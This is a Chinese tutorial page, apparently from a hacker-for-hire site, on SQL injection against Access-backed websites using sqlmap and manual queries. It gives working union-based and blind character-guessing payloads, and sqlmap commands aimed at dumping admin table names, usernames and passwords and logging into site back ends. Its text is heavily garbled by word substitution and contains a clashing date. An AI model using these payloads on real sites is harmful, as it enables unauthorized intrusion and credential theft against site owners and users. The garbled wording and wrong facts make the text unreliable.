运用SQLMap进行Access注入

访客5年前黑客工具760

1.1运用sqlmap进行access注入
关于存在access注入的站点,能够经过手艺注入或许东西注入来获取access数据库中的表以及内容,特别是获取网站后台办理表中的用户名及其暗码。
1.1.1 access数据库简介
Microsoft Office Access是由微软发布的联系数据库办理体系。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特色,是Microsoft Office 的体系程序之一。Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发东西结合在一起的一个数据库办理体系。它是微软OFFICE的一个成员,在包括专业版和更高版其他office版别里边被单独出售。2012年12月4日,最新的微软Office Access 2019在微软Office 2019里发布,微软Office Access 2013 是前一个版别,默然装置Office是不装置Access数据库。
MS ACCESS以它自己的格局将数据存储在依据Access Jet的数据库引擎里。它还能够直接导入或许链接数据(这些数据存储在其他应用程序和数据库)。软件开发人员和数据架构师能够运用Microsoft Access开发应用软件,“高档用户”能够运用它来构建软件应用程序。和其他工作应用程序相同,ACCESS支撑Visual Basic宏言语,它是一个面向目标的编程言语,能够引证各种目标,包括DAO(数据拜访目标),ActiveX数据目标,以及许多其他的ActiveX组件。可视目标用于显现表和报表,他们的办法和特点是在VBA编程环境下,VBA代码模块能够声明和调用Windows操作体系函数。
(1)ACCESS数据库结构
ACCESS数据库选用表名-列名-内容数据,它不像MySQL和MSSQL,需求先创立数据库,然后创立表,输入内容到表中。ACCESS的数据库是一个mdb文件(例如data.mdb),一个库能够包括若干张表。
(2)操作ACCESS数据库
默许是在装置Office时挑选装置Access组件来创立数据库,对数据库中的表施行办理操作。也能够经过一些Access数据库拜访东西进行操作。
1.1.2Access注入根底
1. access注入根本流程
(1)判别有无注入
(2)猜解表名
(3)猜解字段
(4)猜解办理员字段值
(5)猜解用户名和暗码长度
(6)猜解用户名和暗码
(7)破解加密暗码
(8)寻觅并登录后台
2.常见的注入东西
常见的SQL注入东西有“HDSI 3.0 Goldsun洁净拓展版”、“Domain”、“Safe3”、“啊D东西”、“井蛙之见”、Havij、pangolin、WebCruiser和SQLmap等。现在只是SQLmap是开源,出于安全考虑,主张用sqlmap东西进行access注入。
3.常见的查询 ***
(1)联合查询法(速度快,兼容性欠好)
and 1=1 and 1=2 ——判别注入
order by 22  ——猜有多少列(12正确,13过错,则为12个)
union select 1,2,3,4,5,6,7,8,9,10,11,12from admin ——猜表名(报错阐明表名不存在,将admin表换成其他持续猜想)
union select 1,2,username,4,5,6,7,8,9,10,11,12from admin ——猜列名(列名方位放置页面上显现的数字方位上,报错阐明列名不存在,换列明持续猜,列名猜对后及出账号暗码)
(2)逐字猜解法(速度慢,兼容性好)
and 1=1 and 1=2 ——判别注入
and exists (select * from admin) ——猜表名
and exists (select user_name from admin) ——猜列名
查数据:1.确认长度 2.确认asc数据(asc编码)
and (select top 1 len(user_name ) fromadmin)=5(user_name 的长度=5,正常则=5,也能够用>,
and (select top 1 asc(mid(user_name ,1,1))from admin)=97 判别之一位(97代表‘a’的ascll值)
and (select top 1 asc(mid(user_name ,2,1))from admin)=97 判别第二位
(user_name =admin 之一位a 第二位d 第三位m 第四位i 第五位npass_word=a48e190fafc257d3)
4. 判别有无注入
(1)大略型:提交单引号’,id值-1、id值+1,判别页面显现信息不同或许犯错信息。
(2)逻辑型(数字型注入):and1=1 、and 1=2;正常显现,内容与正常页面显现的成果根本相同;提示BOF或EOF(程序没做任何判别时),或提示找不到记载,或显现内容为空(程序加了on error resume next);在数据库中是否履行,and 1=1 永远为真所以页面回来正常,and 1=2永远为假所以回来的成果会犯错,依据其成果来判别是否存在sql注入。
(3)逻辑型(字符型注入):’and ’1′=’1/’ 、and ’1′=’2
(4)逻辑型(搜索型注入):%’and 1=1 、and ‘%’='%/%’ 、and 1=2 and ‘%’='%
1.1.3SQLmap思路及指令
1. SQLmapaccess注入操作思路
(1)手艺判别url是否存在SQL注入。经过在url传入参数处参加“’”、and 1=1、and 1=2等,检查页面是否犯错,假如存在页面不相同或许有犯错信息,则标明网站url存在sql注入。常见的过错信息如下:
Microsoft JET Database Engine 过错 ’80040e14′
在联合查询中所选定的两个数据表或查询中的列数不匹配。
/view.asp,行 26
以上信息标明数据库选用Access数据库。
(2)运用sqlmap进行检测注入点是否可用
Sqlmap指令:sqlmap.py –uurl 
假如存在,则会提示进行相应操作,例如判别数据库中的表,假如不存在则无法持续。
(3)检测表,履行“sqlmap.py–u url –tables”指令来获取access数据库表,需求挑选线程数,主张挑选1-20之间,这个数过大,会导致网站无法翻开。

[1] [2] [3]  黑客接单网

相关文章

下一代网络钓鱼技术——滥用Azure信息保护功能-黑客接单平台

在这篇文章中,咱们将从攻击者的视点介绍怎么运用Azure信息维护(Azure Information Protection,AIP)来改善网络垂钓技能。这个主意是在一次测验作业进程中发生的,其时我正在...

浅谈web安全之手艺检测sql注入以及取得信息

所谓SQL注入,便是经过把SQL指令刺进到Web表单递送或输入域名或页面恳求的查询字符串,终究到达诈骗服务器履行歹意的SQL指令。 查验是否可以注入 and 1=1 正常 and 1=2 犯错 h...

谁看了你的Instagram账户?又是谁盗取了你的暗码?

简介 移动运用程序现在现已成为最有用的进犯向量之一,这些网络罪犯最喜欢的一种办法就是盛行运用程序的乱用。自己审视下是否在装置一款需求衔接到交际运用账户凭据,电子邮件账户,云存储服务的运用时有静下来细细...

用Google破解Google的ReCaptchav2 验证码

这是一个名叫ReBreakCaptcha的逻辑缝隙,而这个缝隙将答应你轻松地绕过网站所选用的GoogleReCaptcha v2验证码。 技能概览 早在2019年,我就开端研讨怎么才干绕过Google...

怎么使用神经网络和Python生成指定形式的暗码

今日给咱们介绍的是Github上一个名叫PyMLProjects的项目,这个项意图意图是为了练习AI来学习人类结构暗码的形式,然后咱们就可以用AI来生成许多同一形式或品种的暗码了。这种办法或许可以用...

Web安全之XSS、CSRF和JWT

XSS 跨站脚本(Cross-site scripting,一般简称为XSS)是一种网站运用程序的安全漏洞进犯,是代码注入的一种。它答应歹意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这...